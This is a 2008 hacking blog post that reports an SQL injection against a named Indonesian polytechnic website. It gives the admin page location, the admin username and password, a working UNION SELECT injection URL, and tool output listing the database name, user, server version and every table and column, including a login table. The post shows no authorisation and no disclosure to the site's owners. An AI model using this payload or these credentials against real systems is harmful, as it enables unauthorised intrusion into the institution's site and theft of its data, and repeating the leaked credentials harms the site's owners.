viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, October 10, 2008

[SQLi] http://www.poltek-api.ac.id/

8:27 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://www.poltek-api.ac.id/admin.php
Admin usr:pwd --> admin:admin (easy ^^)
Dump:
[+] URL:http://www.poltek-api.ac.id/detail_berita.php?id=18+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 16:28:31
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: apidb
User: poltekapi@localhost
Version: 5.0.32-Debian_7etch5-log

[Database]: apidb
[Table: Columns]
[0]agenda: id,judul,indeks,isi,status,tgl_kirim
[1]artikel: id,judul,indeks,isi,status,tgl_kirim
[2]berita: id,judul,indeks,isi,status,tgl_kirim
[3]bukutamu: id,nama,alamat,email,pesan,status
[4]bursa: id,judul,indeks,isi,status,tgl_kirim
[5]content: kode,judul,indeks,isi,status,tgl_kirim
[6]foto: id,judul,indeks,isi,status,tgl_kirim
[7]login: user,pass
[8]pengumuman: id,judul,indeks,isi,status,tgl_kirim
[9]profil: id,judul,indeks,isi,status,tgl_kirim

[-] [16:28:42]
[-] Total URL Requests 58
[-] Done

0 comments:

Post a Comment